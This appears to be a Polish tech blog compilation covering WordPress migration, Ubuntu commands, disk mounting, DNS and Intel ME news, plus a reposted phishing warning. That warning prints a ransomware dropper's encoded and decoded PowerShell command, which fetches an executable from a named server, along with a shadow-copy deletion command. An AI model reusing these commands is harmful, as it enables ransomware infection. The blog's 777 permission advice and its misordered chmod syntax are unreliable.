Przenosimy stronę wordpress na inny serwer

 

Migracja WordPressa – uniwersalna.

Nie zawsze migracja przy użyciu wtyczki do wordpress-a daje radę dlatego poniżej zamieszczam sposób uniwersalny na przeniesienie strony.

 

1. Wyeksportuj Bazę Danych

Zaloguj się do phpMyAdmin’a, menu po lewej stronie wybierz bazę danych, która odpowiedzialna jest za WordPressa.

Następnie w górnym menu wybierz „Eksport”. Zostaniesz przeniesiony do zakładki, która pozwala zapisać kopię bazy danych. Zaznacz pole „Dostosuj” i w sekcji „Wyjście” zaznacz pole „Zapisz wynik do pliku”. Wybierz także kompresję .ZIP lub .GZIP.

Potwierdź wykonanie kopii zapasowej przyciskiem „Wykonaj” u dołu ekranu. Baza danych zostanie zapisana na dysku w formacie .ZIP lub .GZIP.

Krok 2: Zaimportuj bazę danych w swoim hostingu (lub VPS)

Zaloguj się do swojego panelu klienta u swojego hostingodawcy (lub bezpośrednio do phpMydmin). Następnie przejdź do zakładki z bazami danych i utwórz nową bazę danych.

Po stworzeniu bazy danych znajdziesz w panelu klienta odnośnik do menedżera phpMyAdmin. Kliknij w odnośnik do phpMyAdmin i zaloguj się do swojej bazy danych.

Po wejściu do phpMyAdmin wybierz swoją bazę z menu po lewej stronie i przejdź do zakładki „Import”. W tym miejscu możesz zaimportować całą bazę danych bezpośrednio z pliku kopii zapasowej. Kliknij „Wybierz plik”, wskaż plik z rozszerzeniem .gzip i potwierdź import bazy danych.

Gdy baza zostanie zaimportowana, to wyświetlą się jej tabele w menu bocznym. Wybierz teraz tabelę „wp_options”, klikając w nią lewym przyciskiem myszy. Pojawią się szczegóły tabeli „wp_options”. Znajdziesz tu dwa wpisy, których zawartość musisz zaktualizować. Są to wpisy siteurl oraz home i zawierają one ścieżkę do strony.

Aktualna ścieżka wskazuje na twoją starą domenę więc jeżeli uległa ona zmianie należy poprawić rekordy.

Kliknij w przycisk „Edytuj” obok pól „siteurl” oraz „home”, aby zmienić wartość.

 

W każdym z tych pól wpisz swój adres domeny, którą wykupiłeś dla WordPressa. Przykładowo, jeśli domena to blog.moj.pl, to zamiast powyższej ścieżki należy wpisać:

http://blog.moj.pl

Potwierdź wykonanie zmiany. Gdy pola „siteurl” oraz „home” wskazują na twoją domenę, to możesz wyjść z panelu phpMyAdmin.

Krok 3: Przekopiuj pliki WordPressa z komputera na serwer

Pierwszym krokiem jest przekopiowanie plików na twój serwer zewnętrzny. Do tego będziesz potrzebować dowolnego klienta FTP, czyli programu, który pozwoli połączyć Ci się z twoim serwerem i przekopiować na niego pliki. Jednym z popularniejszych klientów FTP jest program FileZilla.

Pobierz FileZilla

Uruchom program FileZilla, a następnie kliknij „Plik > Menedżer stron”. W tym miejscu możesz skonfigurować swoje połączenie z serwerem FTP.

Kliknij w przycisk „Nowy adres” po lewej stronie, aby dodać nowy wpis. W zakładce „Ogólne” musisz wypełnić odpowiednie pola, aby można było się połączyć z serwerem. Są to następujące pola:

  • Serwer: wpisz tu adres serwera FTP
  • Port: wpisz numer portu (zazwyczaj jest to 21)
  • Tryb logowania: wybierz „Normalne”
  • Użytkownik: podaj nazwę użytkownika dla konta FTP
  • Hasło: podaj hasło dla konta FTP

Wszystkie powyższe dane powinieneś znaleźć w wiadomości od swojego hostingodawcy. Gdy skonfigurujesz już całe połączenie, to kliknij w przycisk „Połącz”, aby połączyć się z serwerem FTP.

Po jednej stronie okna widzisz teraz zawartość swojego serwera FTP, po drugiej z kolei wyświetla się zawartość twojego komputera. Wejdź teraz do folderu  z WordPressem.

Skopiuj folder z WordPressem na swój serwer FTP. Wystarczy w tym celu kliknąć folder z WordPressem prawym przyciskiem myszy i wybrać opcję „Wyślij”. Rozpocznie się wysyłanie plików WordPressa. Może to trochę potrwać, więc musisz uzbroić się w cierpliwość.

Krok 4: Zaktualizuj plik wp-config.php o nowe dane do bazy MySQL

Już prawie cały proces za tobą. Ostatnim krokiem jest zaktualizowanie zawartości pliku wp-config.php, który wysłałeś wraz z resztą plików WordPressa na serwer FTP. Plik ten zawiera dane do logowania do bazy danych, jednak póki co wskazuje on na twoją starą bazę danych z poprzedniej lokalizacji. Sprawia to, że WordPress nie może się połączyć z bazą i strona nie będzie działać.

Musisz edytować ten plik na serwerze FTP i wpisać w nim dane do twojej bazy danych w swoim hostingu. W tym celu w programie FileZilla zaloguj się na swój serwer FTP i wejdź do folderu z WordPressem. Poszukaj pliku wp-config.php, kliknij go prawym przyciskiem myszy i wybierz „Podgląd/Edytuj”.

Zostaniesz zapytany, jakim programem otworzyć plik wp-config.php. Zostaw domyślne ustawienia i kliknij OK. Plik otworzy się w Notatniku systemowym.

Musisz w nim teraz wpisać wszystkie dane do logowania do bazy danych na twoim serwerze. Odpowiadają za to poniższe pola:

  • DB_NAME: wpisz tu nazwę bazy danych (widoczna w panelu klienta)
  • DB_USER: wpisz nazwę użytkownika do bazy danych
  • DB_PASSWORD: wpisz tu hasło do logowania do bazy danych
  • DB_HOST: wpisz tu adres do bazy danych

Dane te znajdują się w panelu klienta oraz pojawiają podczas tworzenia bazy danych. Po wszystkim kliknij „Plik > Zapisz” i zamknij okno Notatnika.

Zostaniesz teraz zapytany przez program FileZilla, czy chcesz zaktualizować plik wp-config.php na serwerze. Kliknij „Tak”, aby potwierdzić wysłanie zaktualizowanego pliku. Możesz już zamknąć program FileZilla.

Krok 5: Przekieruj domenę na folder WordPressa na swoim serwerze

Ostatnim krokiem jest przekierowanie domeny, którą wykupiłeś, na swój serwer i na serwer FTP. Zaloguj się do swojego panelu klienta i przejdź do ustawień domeny.

Możesz w tym miejscu wybrać, czy domena ma być przekierowana bezpośrednio na główny folder serwera (tzw. root), czy też na wybrany podfolder.

Jeśli WordPressa przekopiowałeś „luzem” na swój serwer (czyli od razu po wejściu na serwer FTP widać pliki .PHP oraz foldery typu wp-content, wp-plugins, wp-includes), to domena powinna wskazywać bezpośrednio na główny katalog serwera.

Jeśli jednak twój WordPress jest umieszczony w osobnym podfolderze na serwerze (np. w podkatalogu „wordpress”), to musisz wejść do ustawień domeny i ustawić ją tak, aby wskazywała na ten folder.

Gdy to zrobisz, zaakceptuj zmiany i poczekaj, aż domena zostanie zaktualizowana o odpowiednie informacje.

Znane problemy:

1 Problem z bezpośrednimi linkami

Chcesz używać bezpośrednich odnośników w formacie własnym. Musisz je włączyć w panelu admina menu ustawienia bezpośrednie odnośniki. Odznaczasz format własny i wklejasz /%postname%/
Będziesz wtedy miał odnośniki w formacie http://domena/nazwa postu. Odnośniki takie są lepsze pod kątem wyszukiwarki Google i wiemy z nich o czym jest post. Ostatnio spotkałem się z problemem że po zainstalowaniu bloga na WordPress i włączeniu ich nie działały. Bloga można było zobaczyć tylko klikając adres główny domeny. Jeśli chcieliśmy wejść na inną stronę bloga wyskakiwała strona błędu 404. W panelu admina było to samo wyskakiwała strona błędu.

Powodem zamieszania jest najczęściej brak lub nieodpowiedni plik .htaccess


# BEGIN WordPress

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ – [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

Nieraz zdarza się że to nie wystarczy i trzeba poprawić apache2.conf w katalogu

etc/apache2

dodając parametry:

<Directory /var/www/>
Options Indexes FollowSymLinks
AllowOverride all
Require all granted
</Directory>

2. Problemy z biblioteką mediów, aktualizacją i wgrywaniem wtyczek (ograniczenie wielkości plików).

Nie zawsze odpowiednie wpisy w .htaccess są wystarczające gdyż problem może leżeć w konfiguracji pliku php.ini ( szczególnie na domyślnym pliku na VPS).

Trzeba poprawić php.ini w katalogu

etc/php/7.0/apache2/php.ini

dodając (edytując) te linie kodu:

upload_max_filesize = 50M

post_max_size = 50M

 

3. Nie wystarczające uprawnienia upload-u plików, aktualizacji lub instalacji wtyczek.

Używając filezilli zmieniamy prawa do plików w katalogu wordpress-a

Katalogom dajemy prawa 755

Plikom dajemy 644

Wyjątek stanowi katalog wp-content którego podkatalogi ustawiamy następująco :

  • uploads (pliki i katalogi na 777)
  • upgrade (pliki i katalogi na 777)
  • themes (katalogi na 777 pliki 666)
  • plugins (katalogi na 777 pliki 666)

4. Jeżeli nasza strona miała włączoną wtyczkę przekierowującą ruch na https należy bezwzględnie po przekopiowaniu plików strony wejść do katalogu wtyczki i ją awaryjnie wyłączyć zmieniając jej nazwę – to sprawi że strona stanie się widoczna na nieszyfrowanym połączeniu do czasu zainstalowania odpowiedniego certyfikatu.

Ubuntu – przydatne komendy

Z konsoli korzysta prawie każdy użytkownik Linuksa. Warto poznać najpopularniejsze komendy, które usprawnią naszą pracę z komputerem.

apt-get update – odświeżanie wszystkich dostępnych paczek
apt-get upgrade – aktualizacja wszystkich dostępnych paczek
apt-get dist-upgrade – aktualizacja wszystkich dostępnych paczek z nadpisywaniem; aktualizacja wersji Ubuntu
apt-get install pkg – instalacjia programu o przykładowej nazwie pkg
apt-get purge pkg – usuwanie programu o przykładowej nazwie pkg
apt-get autoremove – usuwanie nieużywanych pakietów

apt-get --purge remove - usunięcie pakietu

sudo apt autoremove – usuwanie nieużywanych pakietów
apt-get -f install – próbuje naprawić uszkodzone pakiety

apt –fix-broken install – próbuje naprawić uszkodzone pakiety
dpkg –configure -a – próbuje naprawić uszkodzone pakiety
dpkg -i paczka.deb – instalacja pliku paczka.deb
(plik) /etc/apt/sources.list – lista repozytoriów APT

sudo chmod nazwa_folderu 666 – sprawi,że każdy będzie mógł zapisywać oraz odczytywać wszystko wewnątrz tego folderu. Jeżeli natomiast użyjemy parametr 777 dla pliku, wszyscy będą mogli go wykonywać(uruchamiać).

sudo kill [PID] – Program może zużywać więcej zasobów niż zwykle lub po prostu nie możesz zamknąć go w normalny sposób. Właśnie wtedy z pomoc przychodzi nam polecenie KILL w terminalu. Na początek musimy znaleźć PID (numer identyfikacyjny procesu). Możemy tego dokonać wykonując np. polecenie TOP lub PS -aux.

sudo auto-apt ./configure – Często się zdarza przy próbie instalacji nowego oprogramowania, że zależności pomiędzy pakietami nie zostały spełnione. Innymi słowy brakuje oprogramowania, które jest niezbędne do poprawnej jego instalacji lub działania. W dystrybucjach opartych na Debianie(w tym Ubuntu) możesz zainstalować pakiet o nazwie auto-apt, który zatrzyma kompilator w momencie wykrycia brakujących zależności abyś mógł je zainstalować ze źródeł

Przełączenie do trybu tekstowego.
Gdy przykładowo serwer Xów zawiesił się lub uniemożliwia Ci wykonanie jakichkolwiek czynności możesz chcieć przełączyć się do trybu tekstowego bez niepotrzebnego resetowania komputera. W każdej chwili możesz się przełączyć używając kombinacji klawiszy CTRL+ALT+F2 ,a następnie zalogować się na swoje konto.

Powrót do trybu graficznego.
Kiedy naprawimy już usterki za pomocą linii komend, bez problemu przełączymy się do środowiska graficznego dzięki kombinacji CTRL+ALT+F7. Gdyby jednak stało się ,iż ten skrót nie zadziała, wtedy należy spróbować F7 zastąpić jednym z Fów pomiędzy F3-F6.

Aby powyższe komendy działały muszą być uruchamiane w trybie roota, w tym celu przed każdą należy dodać polecenie sudo.

Uwaga na e-maile podszywające się pod DotPay — otworzenie załącznika może Cię kosztować 350 PLN

Od rana informujecie nas o e-maila podszywających się pod firmę DotPay jakie dostajecie na swoje prywatne i firmowe skrzynki. Do wiadomości załączony jest plik, którego otworzenie może zakończyć się infekcją komputera złośliwym oprogramowaniem. Przyjrzymy się wiadomości:

Received: from abl224.rev.netart.pl (77.55.37.224)

From: noreply@dotpay.pl [mailto:noreply@dotpay.pl]
Sent: Tuesday, November 21, 2017 3:40 AM
Subject: Płatność w systemie Dotpay M6694-5134

Numer transakcji:
M6694-5134

Kwota:
62,37 PLN

Status:
wykonana

Drogi Użytkowniku! (Adresatem tej wiadomości jest [$EMAIL_ODBIORCY]).

Odnotowaliśmy próbę płatności w kwocie 62,37 PLN

Opis zamówienia:
Wplata online
Data i czas:
21 listopada 2017 23:42:59

Jeżeli wpłata została dokonana przelewem, odbiorcą przelewu na wyciągu będzie Dotpay SA Wielicka 72, 30-552 Kraków.

Informacja o wykonaniu płatności została przekazana do sprzedawcy, a należne mu środki udostępnione w Serwisie Dotpay.

Ewentualne pytania dotyczące realizacji zamówienia prosimy kierować do sprzedawcy.

Ta wiadomość została wygenerowana automatycznie. Prosimy na nią nie odpowiadać.

Z nadesłanych do nas próbek wynika, że rozsyłanych jest kilka wariantów e-maili (zmienia się numer transakcji i kwota). Oto te, zaobserwowane w przesłanych od Was e-mailach:


M6694-5134 63,37
M7822-5134 302,17
M7295-1680 620,47

Co ciekawe, w pierwszym z ww. wariantów, e-mail wspomina o transakcji z przyszłości (21 listopada) — w kolejnych wariantach atakujący wrócił z podróży w czasie do teraźniejszości 😉

Sama treść e-maila nie jest groźna. Na czym więc polega atak? Na uruchomieniu dołączonego do e-maila załącznika — do którego jednak w ogóle nie odnosi się treść wiadomości. Ciekawe jak bardzo negatywnie wpłynie to na wyniki kampanii — Armaged0n, dasz nam znać na maila? 🙂

Złośliwy załącznik

Do e-maila załączony jest plik:

Platnosc_w_systemie_Dotpay_M6694-5134_PDF.z

będący archiwum zawierającym następujący katalog i plik:

Płatnosc_w_systemie_Dotpay_M6694-5134_PDF.js

o następującej zawartości:

Kliknięcie na ten plik w systemie Windows spowoduje uruchomienie polecenia w PowerShellu, które podbierze i uruchomi złośliwe oprogramowanie szyfrujące dysk.


powershell.exe powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden -EncodedCommand
UABvAHcAZQByAFMAaABlAGwAbAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQB
jAHkAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAcgBvAGYAaQBsAGUAIAAtAHcAaQBuAGQ
AbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBjAG8AbQBtAGEAbgBkACAAKAB
OAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEM
AbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA
6AC8ALwB0AGUAbgBvAHIALgBjAG8AbQAuAHAAbAAvAHAAbABpAGsAaQAvAGIAaQBuAHM
AdAB4AHQALgBlAHgAZQAnACwAHSAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAGIAaQB
uAHMALgBlAHgAZQAdICkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAKAAdICQ
AZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAYgBpAG4AcwAuAGUAeABlAB0gKQA=

czyli:


PowerShell -command ( System.Net.WebClient).DownloadFile('http://tenor.com.pl/
pliki/binstxt.exe','C:\Users\xxx\AppData\Roaming'\bins.exe);
Start-Process ('C:\Users\xxx\AppData\Roaming'\bins.exe);)

Skrypt uruchamia plik binstxt.exe (ransomware) z serwera tenor.com.pl (85.128.135.36) oraz kasuje kopie plików, które zaraz zostaną zaszyfrowane:

cmd.exe vssadmin.exe Delete Shadows /All /Quiet

Złośliwe oprogramowanie melduje się także do serwera

plaamkaa.eu 104.28.0.113

…i po zakończeniu szyfrowania pokazuje ofierze następujący komunikat:

V_o_r_t_e_x R_a_n_s_o_m_w_a_r_e

!!!! U W A G A !!!! Masz Problem Ze Znalezieniem Potrzebnych Danych ? Nie Moesz Otworzy Swoich Dokumentw? Po Otworzeniu Wanych Plikw Widzisz Tylko Nic Nie Mwicy, Dziwny Cig Znakw? Twoje Istotne Pliki Zostay Zaszyfrowane ! Twoje Zdjcia, Dokumenty, Bazy Danych, Zostay Zaszyfrowane Niemozliwym Do Zlamania Algorytmem Aes-256 Metody Tej Do Szyfrowania Zawartosci Dokumentw Uzywaja Sluzby Wywiadowcze I Wojsko.

Gdy To Czytasz Proces Jest Zakoczony, Wytypowane Pliki Zostay Zaszyfrowane A Sam Program Usunity Z Twojego Komputera. Odzyskac Twoje Dane Mozna Tylko Przy Pomocy Dedykowanego Programu Deszyfrujcego, Wraz Z Jednorazowym Kluczem Wygenerowanym Unikalnie Dla Ciebie! Dwa Pliki Odszyfrujemy Bez Opaty Aby Nie By Goosownymi, Za Pozostae Bdziecie Pastwo Musieli Zapaci 100$ Aby Odzyska Pliki Skontaktuj Si Z Nami Pod Adresem: Hc9@2.pl Lub Hc9@goat.si Radzimy Decydowa Si Szybko, 4 Dni Od Zaszyfrowania Opata Zostanie Podniesiona Do 200$.

Kontaktujac Sie Z Nami Pamietaj Aby Podac Id-komputera I Date DANE: IP=X ID=X Data=21-11-2017 00:33:09

źródło: niebezpiecznik.pl

Nowa mutacja trojana Agent omija antywirusy

Nie ma dnia bez nowych próbek złośliwego oprogramowania. Szczęśliwie w zdecydowanej większości są szybko wychwytywane przez oprogramowanie antywirusowe. Dzisiaj rano dostaliśmy jednak w redakcyjnej poczcie szkodnika, który gładko przeszedł przez praktycznie wszystkie programy antywirusowe. Biorąc pod uwagę skłonność internautów do klikania we wszystko, co wygląda na korespondencję urzędową, tym razem zagrożenie jest poważne.

E-mail wygląda przyzwoicie – niejaka Krajowa Administracja Skarbowa przesyła „fakturę 13/11/2017” – jak na listopad, to dobry numer. W środku załącznik w archiwum zip, i kilka słów poprawną polszczyzną – Jakub Kowalski prosi o dołączenie faktury i pozdrawia. Miliony takich wiadomości krążą między firmami i urzędami.

Kliknięcie załącznika w Windowsie rozpakowuje go, a próba otworzenia dokumentu uruchamia domyślną przeglądarkę systemową. Reakcja antywirusa? Żadna. Nawet świetny program Kasperskiego dał się podejść, uznając że plik o nazwie deklaracja (6).js jest bezpieczny. W rzeczywistości jednak mamy do czynienia z nową mutacją trojana z rodziny Agent (JS.Trojan-Downloader.Agent.yq).

Po uruchomieniu w systemie, trojan pobrał z Internetu i zainstalował sniffera Win32/Ursnif, który zmienił zawartość Rejestru, ustawienia firewalla i zaczął rozmawiać z serwerami z chińskiego Internetu – najwyraźniej czekając na jakieś ciekawe dane, takie jak loginy i hasła użytkownika. To, że w Windowsie 10 działał Defender, włączona była ochrona przed exploitami, najwyraźniej nie czyniło żadnej różnicy.

Obecnie serwis Virus Total informuje, że jedynie dwa silniki antywirusowe rozpoznają nową mutację Agenta – Baidu (co ładnie koreluje z rozmowami z chińskimi serwerami) oraz Fortinet. Prosimy więc o zachowanie najwyższej ostrożności przy przeglądaniu jakichkolwiek załączników do e-maili, szczególnie jeśli pochodzą z nieznanych nam źródeł.

Klasyczne hasło o aktualnym systemie i aktualnym antywirusie tym razem sobie podarujemy, zarażony system był przecież świeżutkim Windowsem 10. Zapewne jutro antywirusy będą już wykrywały co trzeba, jednak jutro dla wielu może być za późno.

źródło: dobreprogramy.pl

9.9.9.9 – nowy bezpieczny serwer DNS

Jeśli nie ufacie swoim dostawcom Internetu w kwestii prywatności zapytań do serwerów DNS o nazwy domen, można zawsze skorzystać z największego na świecie publicznego serwera Google, słynnego 8.8.8.8. A co, jeśli w dodatku nie ufacie Google? Już dziś możecie w ustawieniach DNS systemu operacyjnego czy routera wpisać adres IP 9.9.9.9. To nowa publiczna usługa DNS o nazwie Quad9, udostępniona przez Global Cyber Alliance (GCA), która nie tylko zapewnić ma internautom najwyższy poziom prywatności, ale też najwyższy poziom bezpieczeństwa.

Operator Quad9 zapewnia, że zapytaniami nie będą karmione żadne usługi Big Data, że nie będzie przechowywać żadnych danych pozwalających na zidentyfikowanie użytkowników ani też skorelowanie ich z dostępnymi informacjami z innych źródeł – co dziś jest niestety dość częstą praktyką dostawców Internetu, wykorzystujących informacje o zapytaniach użytkowników do budowania ich marketingowych person.

Czy jednak faktycznie można wierzyć w takie zapewnienia? Google w odniesieniu do swojego 8.8.8.8 mówi to dokładnie to samo, mimo że firma z Mountain View siedzi głęboko w biznesie gromadzenia danych o internautach. W wypadku 9.9.9.9 trzeba pamiętać, że za Global Cyber Alliance stoją londyńska policja (City of London Police) oraz nowojorska prokuratura okręgowa (District Attorney of New York County). Ich celem ma być oczywiście walka z cyberzagrożeniami, szczególnie tymi, które wykorzystują słabo zabezpieczone końcówki Internetu Rzeczy. To, czy zaufacie tym wyjaśnieniom zależy oczywiście od Was.

Od samej strony technicznej 9.9.9.9 nie można nic zarzucić. Resolwer działa niezwykle szybko, momentami dwukrotnie szybciej niż ten google’owy, wykorzystuje 70 punktów wejścia w 40 krajach, dostarczonych przez partnera inicjatywy – Packet Clearing House. Dla zainteresowanych uruchomiono też dostęp po IPv6, pod adresem 2620:fe::fe.

Jak zmienić serwer DNS w systemach Windows?

Aby zmienić ustawienia DNS w Windowsie na Quad9, należy kolejno:

  1. w Zasobniku paska zadań wybrać ikonę połączenia sieciowego i z menu kontekstowego wejść w Centrum Sieci i udostępniania,
  2. w lewym górnym menu okna wybrać link Zmień ustawienia karty sieciowej
  3. w nowym oknie wybrać kartę sieciową, nacisnąć prawy przycisk myszy i wybrać Właściwości
  4. w nowym okienku zaznaczyć pozycję Protokół internetowy w wersji 4 (TCP/IPv4) i kliknąć przycisk Właściwości
  5. w okienku Właściwości zaznaczyć Użyj następujących adresów DNS i w polu preferowany adres DNS wpisać 9.9.9.9, a następnie kliknąć OK.

 

źródło: dobreprogramy.pl

Czipsety płyt głównych Intel-a od skylike z poważną dziurą

Intel przyznaje się do dziur w Management Engine

Google dobrze wiedziało co robi, usuwając ze swoich serwerów Intel Management Engine oraz firmware UEFI, by zastąpić je minimalistycznym Linuksem. Intel właśnie przyznał się do katastrofalnych wręcz w swej naturze błędów w oprogramowaniu działającym poniżej warstwy systemu operacyjnego, które otwierają drogę do instalowania niewykrywalnych rootkitów. Narażeni są użytkownicy sprzętu z najnowszą wersją Management Engine, tj. procesorów Core 6. generacji i nowszych, a także układów Xeon, Celeron, Pentium i Atom.

To odkrycie przypadło ludziom ze znanej już z badań w tej tematyce firmy Positve Technologies. Już we wrześniu informowali oni, że są w stanie uruchomić niepodpisany kod w Platform Controler Hubie na dowolnej płycie głównej poczynając od mikroarchitektury Skylake – i obiecali, że pokażą jak to działa podczas najbliższej konferencji Black Hat Europe, która rozpocznie się 4 grudnia w Londynie.

Dopiero teraz Intel zajął głos w tej sprawie – i przyznaje, że odkrywcy zagrożenia, Dmitrij Skliarow, Mark Ermołow i Maksym Gorjaczij, mają rację. Intel Management Engine (ME), Server Platform Services (SPS) oraz Trusted  Execution Engine  są pełne luk, które pozwalają każdemu posiadającemu uprawnienia administracyjne na uruchomienie niewykrywalnego dla użytkownika kodu poniżej systemu operacyjnego. Takie rootkity są w praktyce niemożliwe do wykrycia, czy to za pomocą narzędzi antywirusowych, czy nawet specjalizowanych narzędzi.

Po zainstalowaniu takiego złośliwego oprogramowania na Platform Controller Hubie, może ono pozyskiwać dowolne informacje z pamięci komputera, bez względu na zabezpieczenia systemu operacyjnego. W ten sposób może wydobyć nawet hasła i klucze kryptograficzne, by przeprowadzić dalsze ataki.

Lista zagrożonych czipsetów jest spora, jak wspomnieliśmy obejmuje płyty główne dla praktycznie wszystkich współcześnie produkowanych czipów Intela. Są to:

  • procesory Intel Core 6., 7. i 8. generacji
  • procesory Intel Xeon E3-1200 v5 i v6
  • procesory Intel Xeon Scalable
  • procesory Intel Xeon W
  • procesory Intel Atom C3000
  • procesory Intel Atom E3900 (Apollo Lake)
  • procesory Intel Pentium (Apollo Lake)
  • procesory Celeron z serii N i J.

Wszystkie płyty główne tych procesorów zawierają praktycznie nieudokumentowaną czarną skrzynkę, działającą na bazie 32-bitowego rdzenia x86 Quark oraz systemu operacyjnego MINIX. To właśnie w niej zaimplementowana jest Intel Management Engine, pozwalająca na zdalne zarządzanie komputerami, Server Platform Services, służące do zdalnego zarządzania serwerami w centrach danych, oraz Trusted Execution Engine, sprzętowy system uwierzytelniania dla kodu.

Znany ekspert Matthew Garret zwrócił uwagę na jeszcze jedną kwestię – te luki pozwalają także zdalnym użytkownikom na przeprowadzenie ataku. Wystarczy wykorzystać wcześniej wykrytą lukę w Active Management Technology (AMT), która pozwalała na uwierzytelnienie się za pomocą pustego tokena. Jeśli do tej pory nie załataliście firmware w swoich komputerach wykorzystujących AMT (dotyczy to przede wszystkim sprzętu korporacyjnego), najwyższy czas to zrobić.

A jak zabezpieczyć się przed lukami w IME i innych technologiach Intela oficjalną drogą, bez niszczenia Management Engine za pomocą narzędzia ME_cleaner? Intel zaleca użytkownikom Windowsa i Linuksa pobranie narzędzia Intel-SA-00086, które sprawdzi, czy są oni zagrożeni. Później… no cóż, pozostaje czekać na łatki producentów. Pierwsze jest tu Lenovo, które wydało łatki do zainstalowania z poziomu Windows 10, 8.1 oraz 7. Działających pod Linuksem łatek brak.

 

źródło: dobreprogramy.pl

Montowanie dodatkowych dysków Ubuntu 17.10

Ubuntu w wersji 17.10 automatycznie montuje wszystkie dodatkowe dyski ( USB i HDD) w katalogu :

/media

System identyfikuje montowanie po UUID

dla przykładu :

/media/user/19f14480-a512-4301-8598-994149037418

Jest to dość skomplikowana metoda montowania i w przypadku większej liczby auto montowanych urządzeń może sprawić użytkownikowi nieco problemów z identyfikacją.

Aby uprościć widok naszych dysków skorzystamy z narzędzia wbudowanego w ubuntu 17.10 ( program “dyski”)

zaznacz dysk w którym chcesz zmienić punkt montowania, naciśnij zębatkę i wybierz modyfikuj opcje montowania:

interesują nas 2 opcje

“punkt montowania”

/mnt/sde1

oraz “identyfikowanie jako” zmień na formę:

/dev/sde1

Dzieki tym zmianom nasz dodatkowy dysk będzie dostępny w katalogu:

/mnt/sde1

Teraz potrzebujemy nadać prawa zapisu i odczytu naszemu użytkownikowi (domyślnie prawa zapisu ma tylko root)

sudo chown -R user /mnt/sde1

 

 

 

 

Ubuntu – montowanie partycji NTFS

Automatyczne montowanie partycji NTFS

Wiele osób (spośród posiadaczy Ubuntu) jest równocześnie użytkownikiem Windowsa. Zdarza się, że dla zaoszczędzenia miejsca posiadają wydzielone partycje NTFS, na których magazynują takie dane jak muzyka, zdjęcia. System Ubuntu gwarantuje do nich dostęp, jednak standardowo taka partycja nie jest automatycznie montowana i przed wejściem na nią trzeba podać hasło. W tym artykule zaprezentuję sposób na automatyczne montowanie partycji od razu po starcie systemu.

Na początek zainstaluj pakiet, dzięki któremu Twój system będzie mógł obsługiwać partycje NTFS:

sudo apt-get install ntfs-3g

Teraz musisz sprawdzić jaki „numerek” przypisał system dyskom, które chcesz zamontować. Otwórz terminal i wydaj polecenie:

sudo fdisk -l

To polecenie wyświetli wszystkie wykrywane przez system partycje. Powinna zainteresować Cię ta część:

Device Boot      Start         End      Blocks   Id  System
/dev/sda1   *           1         898     7213153+   7  HPFS/NTFS
/dev/sda2             899       19456   149067135    f  W95 Ext'd (LBA)
/dev/sda5            8188       19456    90518211    7  HPFS/NTFS
/dev/sda6             899        1022      995967   82  Linux swap / Solaris
/dev/sda7            1023        8187    57552831   83  Linux

Łatwo z niej wywnioskować, że partycje NTFS posiadają oznaczenie sda1 i sda5 – oczywiście w Twoim przypadku mogą być to zupełnie inne oznaczenia.

Nie zamykając terminalu wydaj polecenie:

sudo ls -l /dev/disk/by-uuid/

Tym razem powinieneś zainteresować się tym:

lrwxrwxrwx 1 root root 10 2008-08-08 09:51 343e5ec1-99ed-4682-a6cb-5aa6a8e1f44a -> ../../sda7
lrwxrwxrwx 1 root root 10 2008-08-08 09:51 92701CA6701C9359 -> ../../sda5
lrwxrwxrwx 1 root root 10 2008-08-08 09:51 A080692280690060 -> ../../sda1
lrwxrwxrwx 1 root root 10 2008-08-08 09:51 bb2b23d0-b133-4ca7-b0cb-fc8aa44b32f7 -> ../../sda6

Odszukaj na liście partycje, które chcesz zamontować (w MOIM przypadku sda5 i sda1) i zapisz sobie ich UUID (specjalnie je pogrubiłem)

Aby poprawnie zamontować partycję musisz utworzyć katalog, do którego dana partycja będzie montowana. Aby to zrobić wydaj w terminalu polecenie:

sudo mkdir /media/nazwa_katalogu

Polecam tworzenie katalogów o nazwie odpowiadającej oznaczeniu naszego dysku, czyli dla sda1 będzie to:

sudo mkdir /media/sda1

a dla sda5:

sudo mkdir /media/sda5

Podana ścieżka będzie ważna w dalszej części poradnika! Zapamiętaj ją!

Teraz będzie z górki, jednak nadal musisz być ostrożny. Czas na edycję pliku fstab, aby to zrobić wpisz:

sudo gedit /etc/fstab

Zobaczysz coś takiego:

# /etc/fstab: static file system information.
#
# <file system> <mount point>   <type>  <options>       <dump>  <pass>
proc            /proc           proc    defaults        0       0
# /dev/sda7
UUID=343e5ec1-99ed-4682-a6cb-5aa6a8e1f44a /               ext3    relatime,errors=remount-ro 0       1
# /dev/sda6
UUID=bb2b23d0-b133-4ca7-b0cb-fc8aa44b32f7 none            swap    sw              0       0
/dev/sda5    /media/sda5    ntfs    rw,nosuid,nodev,noatime,user_id=0,group_id=0,allow_other,auto    0    1
/dev/sda1    /media/sda1    ntfs    rw,nosuid,nodev,noatime,user_id=0,group_id=0,allow_other,auto    0    1
/dev/scd0       /media/cdrom0   udf,iso9660 user,noauto,exec,utf8 0       0
/dev/fd0        /media/floppy0  auto    rw,user,noauto,exec,utf8 0       0

Odszukaj partycje które chcesz zamontować i je usuń (Ctrl + X) – cały wpis, tak jak zaznaczyłem. Nie zamykaj pliku!

Teraz uzupełnij odpowiednio poniższy przykład:

#/dev/oznaczenie_partycji
UUID=uuid_partycji /media/nazwa_katalogu ntfs defaults,utf8,umask=007,gid=46 0 0

Pogrubione miejsca musisz odpowiednio uzupełnić. I tak, dla partycji sda1 będzie to wyglądać nasŧępująco:

#/dev/sda1
UUID=A080692280690060 /media/sda1 ntfs defaults,utf8,umask=007,gid=46 0 0

0 na końcu zonacza, że nie chcę, aby dostęp do partycji był zabezpieczony hasłem – aby zabezpieczyć ustaw 1

A dla sda5:

#/dev/sda5
